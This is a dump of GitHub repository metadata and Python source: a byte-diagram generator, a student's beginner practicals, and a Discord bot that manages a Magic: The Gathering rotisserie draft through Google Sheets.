| 2020-04-04T09:14:09.180461 | 2018-12-16T21:13:38 | 2018-12-16T21:13:38 | 155,812,273 | 4 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5979381203651428,
"alphanum_fraction": 0.6288659572601318,
"avg_line_length": 19.714284896850586,
"blob_id": "a6349573297e53734d3d809a073412b43f8b520e",
"content_id": "e46a16dab48e2581de06c159181fc74b715c4347",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 14,
"path": "/example.py",
"repo_name": "austinv11/ByteDiagrams",
"src_encoding": "UTF-8",
"text": "\ndef test():\n from diagram import ByteDiagram as d\n\n di = d()\n di.add_label(\"head\", 3).add_label(\"metadata\", 6).add_label(\"payload\", 26)\n print(di.total_byte_length())\n print(di.export_diagram(35)[0])\n\n return di.export_diagram(35)\n\n\"\"\"\nfrom example import test\ntest()\n\"\"\"\n"
},
{
"alpha_fraction": 0.43743783235549927,
"alphanum_fraction": 0.4465884268283844,
"avg_line_length": 37.08333206176758,
"blob_id": "094d3381327da5415a36ce4b0d794970adcacd23",
"content_id": "cc2c44c3dac4ab49a02e06bbee468cfb65a33c51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5049,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 132,
"path": "/diagram.py",
"repo_name": "austinv11/ByteDiagrams",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\nfrom typing import List\n\nsymbols = dict(\n se='┌', swe='┬', sw='┐',\n nse='├', nswe='┼', nsw='┤',\n ne='└', nwe='┴', nw='┘',\n ns='│', we='─',\n)\n\nBytesLabel = namedtuple(\"BytesLabel\", [\"length\", \"text\"])\n\n\nclass ByteDiagram:\n\n def __init__(self, labels=[]):\n self.labels = list(labels)\n\n def add_label(self, text: str, length: int) -> \"ByteDiagram\":\n self.labels.append(BytesLabel(length, text))\n return self\n\n def total_byte_length(self) -> int:\n return sum([x.length for x in self.labels])\n\n def export_diagram(self, bytes_per_line: int, offset: int = 0,\n byte_num_offset: int = 0) -> List[str]: # Second row of vars are for internal use only \n assert bytes_per_line < 1000\n\n total_len = self.total_byte_length()\n if total_len <= bytes_per_line:\n bytes_per_line = total_len\n\n # Top of table\n block = symbols['se'] + ((total_len-1) * (symbols['we'] + symbols['swe'])) + symbols['we'] + symbols['sw'] + \"\\n\"\n\n # Header labels\n if bytes_per_line > 100:\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n if j % 100 == 0:\n block += symbols['ns'] + str((j // 100) % 10)\n else:\n block += (symbols['ns'] if i == 0 else \" \")\n block += \" \"\n block += symbols['ns'] + \"\\n\"\n\n if bytes_per_line > 10:\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n if j % 10 == 0:\n block += symbols['ns'] + str((j // 10) % 10)\n else:\n block += (symbols['ns'] if i == 0 else \" \")\n block += \" \"\n block += symbols['ns'] + \"\\n\"\n\n block += symbols['ns']\n for i in range(bytes_per_line):\n j = i + byte_num_offset\n block += str(j % 10) + symbols['ns']\n block += \"\\n\"\n\n chunk_lengths = list([x.length for x in self.labels])\n\n # Header underline\n block += symbols['nse']\n for l in chunk_lengths:\n for i in range(l):\n block += symbols['we']\n block += symbols['nswe'] if i == l - 1 else symbols['nwe']\n block = block[:len(block) - 1] + symbols['nsw'] + \"\\n\"\n\n # Text boxes\n has_remaining = True\n line = 0\n while has_remaining:\n any_remaining = False\n for chunk in self.labels:\n curr_frag = chunk.text\n frag_len = chunk.length + chunk.length - 1\n pointer = line * frag_len\n if len(curr_frag) < pointer:\n block += symbols['ns']\n block += frag_len * \" \"\n else:\n last_index = min(len(curr_frag), pointer + frag_len)\n curr_frag = curr_frag[pointer:last_index]\n padding = \" \" * (frag_len - len(curr_frag))\n block += symbols['ns'] + curr_frag + padding\n if last_index < len(chunk.text):\n any_remaining = True\n line += 1\n block += symbols['ns'] + \"\\n\"\n if not any_remaining:\n has_remaining = False\n\n # Bottom of table\n block += symbols['ne']\n for l in chunk_lengths:\n for i in range(l):\n block += symbols['we']\n block += symbols['nwe'] if i == l - 1 else symbols['we']\n block = block[:len(block) - 1] + symbols['nw']\n\n return [block]\n else:\n for chunk in self.labels:\n assert chunk.length <= bytes_per_line\n\n blocks = list()\n count = 0\n offset = 0\n curr_accumulation = list()\n iterations = 0\n for chunk in self.labels:\n if count + chunk.length <= bytes_per_line:\n curr_accumulation.append(chunk)\n count += chunk.length\n offset += chunk.length\n else:\n blocks.append(ByteDiagram(curr_accumulation).export_diagram(bytes_per_line, offset, bytes_per_line * iterations)[0])\n curr_accumulation.clear()\n count = chunk.length\n offset += chunk.length\n curr_accumulation.append(chunk)\n iterations += 1\n\n if len(curr_accumulation) > 0:\n 
blocks.append(ByteDiagram(curr_accumulation).export_diagram(bytes_per_line, offset - sum([x.length for x in curr_accumulation]), bytes_per_line * iterations)[0])\n\n return blocks\n"
}
] | 2 |
BrodyJorgensen/practicles
|
https://github.com/BrodyJorgensen/practicles
|
a5c2eb955db3c9a69b5cb5a3b5a645512954324a
|
01c74bba6cdaeb306c0a7bf5d35c5d01dda443ef
|
0280d50a488cf64e6bb14c7b6c16b1e73671f072
|
refs/heads/master
| 2020-07-01T10:31:31.686387 | 2019-10-10T01:03:37 | 2019-10-10T01:03:37 | 201,147,565 | 0 | 0 | null | 2019-08-08T00:26:53 | 2019-09-12T01:41:35 | 2019-09-12T02:11:37 |
Python
|
[
{
"alpha_fraction": 0.665354311466217,
"alphanum_fraction": 0.6811023354530334,
"avg_line_length": 62.75,
"blob_id": "73e342482897520510ab6d7543328ad5b7d26c45",
"content_id": "d581f47e7fbef5f59ad5148cfb83ac95ff8fd32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 4,
"path": "/prac_1/electricity_bill_estimator.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "cent_per_KWH = int(input(\"how much doe it cost \"))\ndaily_usage = float(input(\"what is the daily usage \"))\nnumber_of_days = int(input(\"how many days is it used \"))\nprint(\"estinated bill: ${:.2f}\".format((cent_per_KWH /100) * daily_usage * number_of_days))"
},
{
"alpha_fraction": 0.6578431129455566,
"alphanum_fraction": 0.6647058725357056,
"avg_line_length": 26.567567825317383,
"blob_id": "fc354b4fc0646b01dacf0654c4d4a3a2d12eeede",
"content_id": "21d773fe1c7b7441363fb227bd1ff4a1ae115d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 37,
"path": "/prac_7/convert_m_km.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import StringProperty\n\nMILES_TO_KM = 1.60934\n\n\nclass MilesConverterApp(App):\n output_km = StringProperty()\n\n def build(self):\n self.title = \"Convert Miles to Kilometres\"\n self.root = Builder.load_file('convert_m_km.kv')\n return self.root\n\n def handle_calculate(self, number):\n miles = self.convert_to_number(self.number)\n self.update_result(miles)\n return number\n\n def handle_increment(self, number, change):\n miles = self.convert_to_number(self.number) + change\n self.root.ids.input_miles.text = str(miles)\n # Since the InputText.text has changed, its on_text event will fire and handle_calculate will be called\n\n def update_result(self, miles):\n self.output_km = str(miles * MILES_TO_KM)\n\n def convert_to_number(self.number):\n try:\n value = float(number)\n return value\n except ValueError:\n return 0\n\n\nMilesConverterApp().run()\n"
},
{
"alpha_fraction": 0.6597353219985962,
"alphanum_fraction": 0.6635160446166992,
"avg_line_length": 32.0625,
"blob_id": "fbc20175374f06d95be5808f3500f431cb5df391",
"content_id": "28aacc528d2460bceed7a76caffa2a3ae122e906",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/prac4/scores.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "scores_file = open(\"scores.csv\")\nscores_data = scores_file.readlines()\nprint(scores_data)\nsubjects = scores_data[0].strip().split(\",\")\nscore_values = []\nfor score_line in scores_data[1:]:\n score_strings = score_line.strip().split(\",\")\n score_numbers = [int(value) for value in score_strings]\n score_values.append(score_numbers)\nscores_file.close()\nfor i in range(len(subjects)):\n print(subjects[i], \"Scores:\")\n for score in score_values[i]:\n print(score)\n print(\"Max:\", max(score_values[i]))\n print()\n"
},
{
"alpha_fraction": 0.5874999761581421,
"alphanum_fraction": 0.6354166865348816,
"avg_line_length": 21.904762268066406,
"blob_id": "db273d324cceae6725e9b753373f78d5d9ea007d",
"content_id": "82e1da5204a543cc2d1a31679f3cdc48430a23ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 21,
"path": "/prac_1/loops.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "#for the odd numbers\n#for i in range(1, 21, 2):\n# print(i)\n\n#count to 100 in lots of 10\n#for i in range(0, 101, 10):\n# print(i)\n\n#to ocunt down from 20\n#for i in range(20, 0, -1):\n# print(i)\n\n#printing different numbers of stars\n#number_of_stars = int(input(\"Number of stars: \"))\n#for i in range (number_of_stars):\n# print('*')\n\n#increasing stars being printed\nnumber_of_stars = int(input(\"Number of stars: \"))\nfor i in range(1, number_of_stars + 1):\n print('*' *i)"
},
{
"alpha_fraction": 0.6124293804168701,
"alphanum_fraction": 0.6259887218475342,
"avg_line_length": 31.77777862548828,
"blob_id": "c206c1ce0a5b9acb2ff5c6be0d5e24ced63da8bc",
"content_id": "6d3664e3322e1b10bffbbb381cab1422d39d6116",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 27,
"path": "/prac_6/programming_language.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "class ProgrammingLanguage:\n\n def __init__(self, name, type, reflection, year):\n self.name = name\n self.type = type\n self.reflection = reflection\n self.year = year\n\n def __str__(self):\n return \"{}, {} Type, Reflection={}, Year={}\".format(self.name, self.type, self.reflection, self.year)\n\n def is_dynamic(self):\n return self.type == \"dynamic\"\n\n# testing if the language is dynamic\n# def testing(self):\n# ruby = ProgrammingLanguage(\"Ruby\", \"dynamic\", True, 1995)\n# python = ProgrammingLanguage(\"Python\", \"Dynamic\", True, 1991)\n# visual_basic = ProgrammingLanguage(\"Visual Basic\", \"static\", False, 1991)\n\n# languages = [ruby, python, visual_basic]\n# print(python)\n\n# print(\"The dynamically typ of languages are: \")\n# for language in languages:\n# if language.is_dynamic():\n# print(language.name)\n"
},
{
"alpha_fraction": 0.5037878751754761,
"alphanum_fraction": 0.5113636255264282,
"avg_line_length": 33.456520080566406,
"blob_id": "195f2e864c61f3e9ebe9f29ae2c28ef94b37f94a",
"content_id": "c7ec1fad8b4157988a15b938b778f54313a15647",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1584,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 46,
"path": "/prac_6/car_simulator.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "from prac_6.car import Car\n\nMENU = \"Menu:\\nd) drive\\nr) refuel\\nq) quit\"\n\n\ndef main():\n \"\"\"Car simulator program, demonstrating use of Car class.\"\"\"\n print(\"Let's drive!\")\n name = input(\"Enter your car name: \")\n # create a Car instance with initial fuel of 100 and user-provided name\n car = Car(type, 100)\n print(car)\n print(MENU)\n choice = input(\"Enter your choice: \").lower()\n while choice != \"q\":\n if choice == \"d\":\n distance_to_drive = int(\n input(\"How far do you want to go? \"))\n while distance_to_drive < 0:\n print(\"Distance must be >= 0\")\n distance_to_drive = int(\n input(\"How far do you want to go? \"))\n distance_driven = car.drive(distance_to_drive)\n print(\"The car has driven {}km\".format(distance_driven), end=\"\")\n if car.fuel == 0:\n print(\" out of fuel\", end=\"\")\n print(\".\")\n elif choice == \"r\":\n fuel_to_add = int(input(\n \"How much fule are you putting in? \"))\n while fuel_to_add < 0:\n print(\"Fuel must be >= 0\")\n fuel_to_add = int(input(\n \"How much fule are you putting in? \"))\n car.add_fuel(fuel_to_add)\n print(\"Added {} L of fuel.\".format(fuel_to_add))\n else:\n print(\"Invalid choice\")\n print()\n print(car)\n print(MENU)\n choice = input(\"Enter your choice: \").lower()\n print(\"\\nGood bye {}'s driver.\".format(car.type))\n\n\nmain()"
},
{
"alpha_fraction": 0.4236706793308258,
"alphanum_fraction": 0.48885077238082886,
"avg_line_length": 52,
"blob_id": "308abc5a1a88b9006da70fb8535954e54fb4e775",
"content_id": "0c6c1ec5d686075f44ca0d3e9094a8d25ac5c400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 583,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 11,
"path": "/prac_5/hex_colours.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "HEX_COLOUR_CODES = {\"blue1\": \"#0000ff\", \"blue2\": \"#0000ee\",\n \"blue4\": \"#00008b\", \"BlueViolet\": \"#8a2be2\",\n \"CadetBlue\": \"#5f9ea0\", \"CadetBlue1\": \"#98f5ff\",\n \"CadetBlue2\": \"#8ee5ee\", \"CadetBlue3\": \"#7ac5cd\",\n \"cyan1\": \"#00ffff\", \"cyan2\": \"#00eeee\"}\n\ncolour_name = input(\"Enter a colour name: \")\nwhile colour_name != \"\":\n print(\"The code for \\\"{}\\\" is {}\".format(colour_name,\n HEX_COLOUR_CODES.get(colour_name)))\n colour_name = input(\"Enter a colour name: \")\n"
},
{
"alpha_fraction": 0.6381215453147888,
"alphanum_fraction": 0.6436464190483093,
"avg_line_length": 24.85714340209961,
"blob_id": "42106e1aab1d02c9ecc03100042a61fd7175913d",
"content_id": "050fdd80a59202b5ff169f14104dc11d1a42f569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 14,
"path": "/prac_5/cord_occurences.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "words_to_count = {}\nphrase = input(\"Text: \")\n\nwords = phrase.split()\nfor word in words:\n frequency = words_to_count.get(word, 0)\n words_to_count[word] = frequency + 1\n\nwords = list(words_to_count.keys())\nwords.sort()\n\nmax_length = max((len(word) for word in words))\nfor word in words:\n print(\"{:{}} : {}\".format(word, max_length, words_to_count[word]))\n"
},
{
"alpha_fraction": 0.5289855003356934,
"alphanum_fraction": 0.5942028760910034,
"avg_line_length": 22,
"blob_id": "f8bf80a5a80aa3a9f0476f464599cf8145f62cb0",
"content_id": "9615ab054bbf9796fdc193aecfee01709a84d94b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/prac_1/sales_bunus.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "sales = float(input(\"Enter sales :$\"))\nif sales < 1000:\n bonus = sales * 0.1\nelse:\n bonus = sales * 0.15\nprint(\"Bonus is $\", bonus)\n"
},
{
"alpha_fraction": 0.6291390657424927,
"alphanum_fraction": 0.639072835445404,
"avg_line_length": 27.761905670166016,
"blob_id": "e4da46929d9eb564c50861cb7cb7ad48f10ee039",
"content_id": "67b8a52dda7cacc5a30c6caf04b5e62304843883",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 21,
"path": "/prac4/quick_picks.py",
"repo_name": "BrodyJorgensen/practicles",
"src_encoding": "UTF-8",
"text": "import random\n\nNUMBERS_PER_LINE = 6\nMIN = 1\nMAX = 45\n\nnumber_of_picks = int(input(\"how many numbers do you pick? \"))\nwhile number_of_picks < 0:\n print(\" invalid number, try again \")\n number_of_picks = int(input(\"how many numbers do you pick? \"))\n\nfor i in range(number_of_picks):\n quick_pick = []\n for number in range(NUMBERS_PER_LINE):\n numbers = random.randint(MIN, MAX)\n while numbers in quick_pick:\n numbers = random.randint(MIN, MAX)\n quick_pick.append(numbers)\n quick_pick.sort()\n\n print(\" \".join(\"{:2}\".format(numbers) for numbers in quick_pick))\n"
}
] | 10 |
JewPCabra666/RotisserieDraftHelperBot
|
https://github.com/JewPCabra666/RotisserieDraftHelperBot
|
b77356010dea3892b2ef9a8783d655a982a8aa0d
|
790c22c2b674b19bdfb822ca4b464e9fbf67e39e
|
5615bbdcf881c22440b0e04c7043596c4fff4096
|
refs/heads/master
| 2023-02-01T16:29:24.573084 | 2020-12-21T23:08:26 | 2020-12-21T23:08:26 | 250,184,560 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8510638475418091,
"alphanum_fraction": 0.8510638475418091,
"avg_line_length": 46,
"blob_id": "35f902094880e24d580fad0be4a46575bc685100",
"content_id": "d57a8b4a1af63e97b6fcaa6306a88f679f2bf9af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "# RotisserieDraftHelperBot\nDiscord Bot to assist in Rotisserie Drafts for magic the gathering\n"
},
{
"alpha_fraction": 0.5998266935348511,
"alphanum_fraction": 0.6077989339828491,
"avg_line_length": 28.20942497253418,
"blob_id": "d910fda76c2fa4f8bd128bd09e03e18e2b3b8009",
"content_id": "2ecaca0f01a25c152706f6b88608ea73893e8914",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5776,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 191,
"path": "/bot.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import has_permissions, CheckFailure, Cog\r\nfrom person import get_people, get_cards\r\nfrom credentials import BOTTOKEN\r\nimport time\r\nfrom datetime import timedelta, datetime\r\nimport json\r\nimport threading\r\nimport atexit\r\nfrom sheets import put_value\r\n\r\nbot = commands.Bot(command_prefix='!')\r\n\r\nTOKEN = BOTTOKEN\r\nCUBE_LINK = 'https://cubecobra.com/cube/list/a7y'\r\nSHTLINK = 'https://docs.google.com/spreadsheets/d/1uch6JNOBZR5F4bBTIC8FH__pJV5-mdbILee0jeHOhQo/edit?pli=1#gid=354144647'\r\npeople = get_people()\r\nreverse_people = [x for x in people[::-1]]\r\nCARDS = get_cards()\r\nCURRENT_PERSON_NUM = 0\r\nCURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\nCURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\nPICK_NUMBER = 1\r\nLAST_PICK_TIME = datetime.now()\r\n\r\nstate = {\r\n 'current_person_name': CURRENT_PERSON_NAME,\r\n 'current_pick': 1,\r\n 'last_pick_time': datetime.now()\r\n}\r\n\r\n\r\ndef my_converter(o):\r\n if isinstance(o, datetime):\r\n return o.__str__()\r\n\r\n\r\ndef get_current_person_and_pick():\r\n return CURRENT_PERSON, PICK_NUMBER\r\n\r\n\r\ndef swap_lists():\r\n global people, reverse_people\r\n swap = people\r\n people = reverse_people\r\n reverse_people = swap\r\n\r\n\r\ndef set_current_person(alias):\r\n global CURRENT_PERSON_NAME, CURRENT_PERSON, CURRENT_PERSON_NUM, people\r\n if PICK_NUMBER % 2 == 0:\r\n swap_lists()\r\n for i, x in enumerate(people):\r\n if x.alias == alias:\r\n CURRENT_PERSON_NUM = i\r\n CURRENT_PERSON = x\r\n CURRENT_PERSON_NAME = alias\r\n print(f'Current person set is \\n{CURRENT_PERSON}')\r\n break\r\n\r\n\r\ndef set_next_person(num=1):\r\n global CURRENT_PERSON_NUM, CURRENT_PERSON, CURRENT_PERSON_NAME, PICK_NUMBER, LAST_PICK_TIME\r\n count = num\r\n while count > 0:\r\n if CURRENT_PERSON_NUM == len(people) - 1:\r\n swap_lists()\r\n CURRENT_PERSON_NUM = 0\r\n CURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\n CURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\n PICK_NUMBER += 1\r\n else:\r\n CURRENT_PERSON_NUM += 1\r\n CURRENT_PERSON = people[CURRENT_PERSON_NUM]\r\n CURRENT_PERSON_NAME = CURRENT_PERSON.alias\r\n count -= 1\r\n LAST_PICK_TIME = datetime.now()\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n global PICK_NUMBER, CURRENT_PERSON, CURRENT_PERSON_NAME, CURRENT_PERSON_NUM\r\n print('Bot is ready.')\r\n get_state()\r\n PICK_NUMBER = state['current_pick']\r\n set_current_person(state['current_person_name'])\r\n print(f\"GOT THE STATE - {PICK_NUMBER} - {CURRENT_PERSON_NAME}\")\r\n\r\n\r\nclass Drafting(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n async def pool(self, ctx):\r\n \"\"\"\\t Get the Current Cube Pool\"\"\"\r\n await ctx.send(CUBE_LINK)\r\n\r\n @commands.command()\r\n async def sheet(self, ctx):\r\n \"\"\"\\t Get the Google Sheet\"\"\"\r\n await ctx.send(SHTLINK)\r\n\r\n @commands.command()\r\n async def pick(self, ctx, *, arg):\r\n \"\"\"Syntax: !pick cardname - will put cardname in your column on google sheet and advance\"\"\"\r\n if check_turn(ctx.author.display_name):\r\n put_value(CURRENT_PERSON.column, PICK_NUMBER, arg)\r\n print(CURRENT_PERSON.column, PICK_NUMBER, arg)\r\n await self.advance(ctx)\r\n else:\r\n print(arg)\r\n await ctx.send(\"👀 It is not your turn to pick yet! 
👀\")\r\n\r\n @commands.command()\r\n async def advance(self, ctx, arg=1):\r\n \"\"\"\\t Moves the draft forward a person and resets the clock - takes optional number to move draft forward that many spaces\"\"\"\r\n set_next_person(arg)\r\n persist_state()\r\n await ctx.send(f\"It is now <@{CURRENT_PERSON.id}>'s turn to pick \"\r\n f\"- they have until {(datetime.now() + timedelta(hours=24)).strftime('%A at %H:%M %p')}\")\r\n\r\n @commands.command()\r\n async def whoup(self, ctx):\r\n \"\"\"Find out who the current person is and ping them\"\"\"\r\n await ctx.send(f\"It is <@{CURRENT_PERSON.id}>'s turn to pick \"\r\n f\"- they have until \"\r\n f\"{(LAST_PICK_TIME + timedelta(hours=24)).strftime('%A at %H:%M %p')}\")\r\n\r\n @commands.command()\r\n async def picknum(self, ctx):\r\n \"\"\"Get the current pick number\"\"\"\r\n await ctx.send(f\"It is currently pick {PICK_NUMBER} out of 45 picks\")\r\n\r\n\r\nbot.add_cog(Drafting(bot))\r\n\r\n\r\ndef check_turn(name):\r\n if name == CURRENT_PERSON_NAME:\r\n return True\r\n return False\r\n\r\n\r\ndef get_state():\r\n global state, PICK_NUMBER, LAST_PICK_TIME\r\n with open('last_state.json', 'r') as jsonfile:\r\n state = json.load(jsonfile)\r\n state['last_pick_time'] = datetime.strptime(state['last_pick_time'], \"%Y-%m-%d %H:%M:%S.%f\")\r\n LAST_PICK_TIME = state['last_pick_time']\r\n PICK_NUMBER = state['current_pick']\r\n\r\n\r\ndef persist_state():\r\n global CURRENT_PERSON_NAME, PICK_NUMBER, LAST_PICK_TIME, state\r\n this_state = \\\r\n {'current_person_name': CURRENT_PERSON_NAME,\r\n 'current_pick': PICK_NUMBER,\r\n 'last_pick_time': LAST_PICK_TIME}\r\n state = this_state\r\n with open('last_state.json', 'w+') as jsonfile:\r\n json.dump(this_state, jsonfile, default=my_converter)\r\n\r\n\r\ndef run_bot():\r\n bot.run(TOKEN)\r\n\r\n\r\nt1 = threading.Thread(target=run_bot)\r\nt1.daemon = True\r\nt1.start()\r\n\r\nprint(\"Running Bot\")\r\n\r\n\r\ndef exit_handler():\r\n print(f\"Persisting state at {time.ctime()}\")\r\n persist_state()\r\n print(\"Bot is shutting off\")\r\n\r\n\r\natexit.register(exit_handler)\r\nwhile True:\r\n time.sleep(36000)\r\n persist_state()\r\n print(\"still running\")\r\n#\r\n#\r\n# if __name__ == '__main__':\r\n# main()\r\n"
},
{
"alpha_fraction": 0.6194939017295837,
"alphanum_fraction": 0.6310527920722961,
"avg_line_length": 28.19811248779297,
"blob_id": "7b22b5df022ce200118d9f7884f3a238ccb3b6f6",
"content_id": "630a2191a76633d9ffc75f0569c370293fba6203",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3201,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 106,
"path": "/sheets.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\n\r\nimport time\r\nimport traceback\r\nimport threading\r\n\r\n# If modifying these scopes, delete the file token.pickle.\r\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\r\n\r\n# The ID and range of a sample spreadsheet.\r\nSAMPLE_SPREADSHEET_ID = '1uch6JNOBZR5F4bBTIC8FH__pJV5-mdbILee0jeHOhQo'\r\nSHEET_ID = '354144647'\r\nSAMPLE_RANGE_NAME = 'Class Data!A2:E'\r\n\r\ncreds = None\r\n# The file token.pickle stores the user's access and refresh tokens, and is\r\n# created automatically when the authorization flow completes for the first\r\n# time.\r\nif os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n# If there are no (valid) credentials available, let the user log in.\r\nif not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\nservice = build('sheets', 'v4', credentials=creds)\r\n\r\n\r\ndef every(delay, task):\r\n next_time = time.time() + delay\r\n while True:\r\n time.sleep(max(0, next_time - time.time()))\r\n try:\r\n task()\r\n except Exception:\r\n traceback.print_exc()\r\n # in production code you might want to have this instead of course:\r\n # logger.exception(\"Problem while executing repetitive task.\")\r\n # skip tasks if we are behind schedule:\r\n next_time += (time.time() - next_time) // delay * delay + delay\r\n\r\n\r\ndef main():\r\n \"\"\"Shows basic usage of the Sheets API.\r\n Prints values from a sample spreadsheet.\r\n \"\"\"\r\n\r\n\r\n # Call the Sheets API\r\n result = service.spreadsheets().values().get(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID, range=\"Draft 5 (Commander)!A1:R47\").execute()\r\n print(result)\r\n\r\n values = [\r\n [\"Testing\", \"Testing2\"]\r\n ]\r\n body = {\r\n 'values': values\r\n }\r\n result = service.spreadsheets().values().update(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID, range='Draft 5 (Commander)!J1:L1',\r\n valueInputOption='RAW', body=body).execute()\r\n\r\n print(result)\r\n\r\n\r\ndef put_value(column, pick_number, value):\r\n values = [\r\n [value]\r\n ]\r\n body = {\r\n 'values' : values\r\n }\r\n result = service.spreadsheets().values().update(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID,\r\n range=f'Draft 5 (Commander)!{column}{pick_number+2}:{column}{pick_number+2}',\r\n valueInputOption='RAW',\r\n body=body).execute()\r\n print(result)\r\n\r\n\r\n\r\ndef test():\r\n t1 = threading.Thread(target=lambda: every(10, get_current_person_and_pick))\r\n t1.daemon = True\r\n t1.start()\r\n while True:\r\n print(\"testing?\")\r\n time.sleep(5)\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n"
},
{
"alpha_fraction": 0.5972602963447571,
"alphanum_fraction": 0.5972602963447571,
"avg_line_length": 19.47058868408203,
"blob_id": "1c56b5c59f6ae41d6e4909c09c1bd63a3084b028",
"content_id": "f32ef85dbc7f16938692ba682cf3ebcfa97adf4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 17,
"path": "/testing.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
"text": "import unittest\r\nfrom bot import check_pick\r\n\r\n\r\nclass TestEverything(unittest.TestCase):\r\n\r\n def test_pick_true(self):\r\n x = check_pick('Grand Abolisher')\r\n self.assertEqual(x, True)\r\n\r\n def test_pick_false(self):\r\n x = check_pick('Grand Tester')\r\n self.assertEqual(x, False)\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n"
},
{
"alpha_fraction": 0.5450549721717834,
"alphanum_fraction": 0.5450549721717834,
"avg_line_length": 20.75,
"blob_id": "faa3b605584f39a47a170e65c0397348af477305",
"content_id": "a6ebe8e5ca786bf532b35c90f87f14a1ca27ebc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 40,
"path": "/person.py",
"repo_name": "JewPCabra666/RotisserieDraftHelperBot",
"src_encoding": "UTF-8",
